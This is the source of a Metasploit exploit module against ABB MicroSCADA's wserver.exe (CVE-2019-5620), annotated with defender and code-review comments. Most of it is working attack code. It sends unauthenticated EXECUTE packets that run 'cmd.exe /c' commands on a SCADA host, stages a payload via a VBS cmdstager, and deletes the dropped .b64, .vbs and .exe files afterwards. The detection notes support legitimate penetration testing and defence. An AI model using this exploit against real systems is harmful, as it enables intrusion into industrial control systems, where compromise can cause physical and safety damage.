GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/scada/abb_wserver_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Exploit module for the ABB MicroSCADA wserver.exe EXECUTE handler: a single
# TCP request ("EXECUTE\x00" followed by a command line) runs a command, so the
# module drives the CmdStager mixin over that primitive. Default port is 12221
# (see register_options).
#
# Defender notes, all derived from the packet layout built in check and
# execute_command below:
# - The wire format is unauthenticated plaintext. Every request starts with a
#   4-byte little-endian total length followed by "EXECUTE\x00", and every
#   command request carries the literal prefix "cmd.exe /c ". Both are usable
#   as network-detection signatures on the configured port.
# - On the host, wserver.exe spawning cmd.exe is the process-lineage event to
#   alert on. The cleanup step (execute_cmdstager_end) issues three "del"
#   commands for a .b64, a .vbs and a .exe in the stager's temp directory;
#   those deletions are not verified, so the artifacts may survive for forensics.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager

  # Module metadata. Beyond what the Tcp mixin registers, the only option set
  # here is RPORT, preset to 12221 (the wserver.exe listener). WfsDelay is the
  # framework's wait-for-session delay, raised to 5 seconds here.
  #
  # @param info [Hash] metadata merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'ABB MicroSCADA wserver.exe Remote Code Execution',
      'Description' => %q{
        This module exploits a remote stack buffer overflow vulnerability in ABB MicroSCADA. The
        issue is due to the handling of unauthenticated EXECUTE operations on the wserver.exe
        component, which allows arbitrary commands. The component is disabled by default, but
        required when a project uses the SCIL function WORKSTATION_CALL.

        This module has been tested successfully on ABB MicroSCADA Pro SYS600 9.3 on
        Windows XP SP3 and Windows 7 SP1.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Brian Gorenc', # Original discovery
          'juan vazquez' # Metasploit module
        ],
      'References' =>
        [
          [ 'CVE', '2019-5620' ],
          [ 'OSVDB', '100324'],
          [ 'ZDI', '13-270' ],
          [ 'URL', 'https://library.e.abb.com/public/41ccfa8ccd0431e6c1257c1200395574/ABB_SoftwareVulnerabilityHandlingAdvisory_ABB-VU-PSAC-1MRS235805.pdf']
        ],
      'Platform' => 'win',
      'Arch' => ARCH_X86,
      'DefaultOptions' =>
        {
          'WfsDelay' => 5
        },
      'Targets' =>
        [
          [ 'ABB MicroSCADA Pro SYS600 9.3', { } ]
        ],
      'CmdStagerFlavor' => 'vbs',
      'DefaultTarget' => 0,
      'Privileged' => false,
      'DisclosureDate' => '2013-04-05'
    ))

    register_options([Opt::RPORT(12221)])
  end

  # Fingerprints the service by sending an EXECUTE request with an empty
  # command. No command is run; the reply's error code is what identifies
  # the handler.
  #
  # @return [Exploit::CheckCode] Vulnerable when the reply is exactly 6 bytes
  #   (16-bit LE value 6, then 32-bit LE value 0xe10001); Safe otherwise,
  #   including when no reply arrives (res is nil).
  #
  # NOTE(review): errors raised by connect / sock.put / sock.get_once are not
  # rescued here, so disconnect is skipped on that path; presumably the
  # framework's cleanup closes the socket — confirm.
  def check

    # Send an EXECUTE packet without command, a valid response
    # should include an error code, which is good enough to
    # fingerprint.
    op = "EXECUTE\x00"
    # "V" = 32-bit unsigned little-endian; the length field counts itself.
    pkt_length = [4 + op.length].pack("V") # 4 because of the packet length
    pkt = pkt_length
    pkt << op

    connect
    sock.put(pkt)
    res = sock.get_once
    disconnect

    # Reply layout: 2-byte LE length (6) + 4-byte LE status (0xe10001 for the
    # empty-command probe). This fixed reply is also a usable detection
    # fingerprint for probes against the service.
    # NOTE(review): `and` works as a bare condition but `&&` is the conventional form.
    if res and res.length == 6 and res[0, 2].unpack("v")[0] == 6 and res[2, 4].unpack("V")[0] == 0xe10001
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe

  end

  # Entry point: hands the payload to the CmdStager mixin, which delivers it
  # through execute_command line by line.
  #
  # :linemax caps each stager line at 750 bytes — the original author notes
  # that longer lines trigger the overflow (the Description documents a stack
  # buffer overflow in this handler), which would crash the service instead of
  # running the command. :nodelete disables the stager's own cleanup because
  # execute_cmdstager_end below performs it.
  def exploit
    # More than 750 will trigger overflow...
    # Cleaning is done by the exploit on execute_cmdstager_end
    execute_cmdstager({:linemax => 750, :nodelete => true})
  end

  # Post-staging cleanup hook. Pulls the temp directory and the generated
  # file names out of the stager instance via instance_variable_get (reaches
  # into CmdStager's private state; fragile if those ivar names change —
  # TODO confirm against the mixin) and issues one "del" per artifact.
  #
  # Each "del" goes through execute_command, so a reply other than status 1
  # aborts the module with UnexpectedReply. The reply status reflects the
  # wserver.exe handler, not cmd.exe's result, so a failed deletion is not
  # detected here (presumably — confirm).
  #
  # @param opts [Hash] passed by the CmdStager mixin; unused here
  def execute_cmdstager_end(opts)
    @var_tempdir = @stager_instance.instance_variable_get(:@tempdir)
    @var_decoded = @stager_instance.instance_variable_get(:@var_decoded)
    @var_encoded = @stager_instance.instance_variable_get(:@var_encoded)
    @var_decoder = @stager_instance.instance_variable_get(:@var_decoder)
    print_status("Trying to delete #{@var_tempdir}#{@var_encoded}.b64...")
    execute_command("del #{@var_tempdir}#{@var_encoded}.b64", {})
    print_status("Trying to delete #{@var_tempdir}#{@var_decoder}.vbs...")
    execute_command("del #{@var_tempdir}#{@var_decoder}.vbs", {})
    print_status("Trying to delete #{@var_tempdir}#{@var_decoded}.exe...")
    execute_command("del #{@var_tempdir}#{@var_decoded}.exe", {})
  end

  # Sends one command to the EXECUTE handler. Called by the CmdStager mixin for
  # each stager line and by execute_cmdstager_end for cleanup.
  #
  # Request layout: 4-byte LE total length (including itself), "EXECUTE\x00",
  # then "cmd.exe /c " + cmd with no terminator. Expected reply: 6 bytes,
  # 16-bit LE 6 followed by 32-bit LE status 1 (compare with 0xe10001 for the
  # empty-command probe in check).
  #
  # cmd is interpolated unquoted into a cmd.exe command line; it comes from the
  # stager, not from an external input, so no escaping is done here.
  #
  # @param cmd [String] command line to run under cmd.exe /c
  # @param opts [Hash] passed by the mixin; unused here
  # @raise via fail_with(Failure::UnexpectedReply) on any other reply,
  #   including no reply (res nil)
  def execute_command(cmd, opts)
    op = "EXECUTE\x00"
    command = "cmd.exe /c #{cmd}"
    pkt_length = [4 + op.length + command.length].pack("V") # 4 because of the packet length

    pkt = pkt_length
    pkt << op
    pkt << command

    # One fresh connection per command; disconnect is skipped if put/get_once
    # raise (see note on check).
    connect
    sock.put(pkt)
    res = sock.get_once
    disconnect

    unless res and res.length == 6 and res[0, 2].unpack("v")[0] == 6 and res[2, 4].unpack("V")[0] == 1
      fail_with(Failure::UnexpectedReply, "Unexpected reply while executing the cmdstager")
    end
  end
end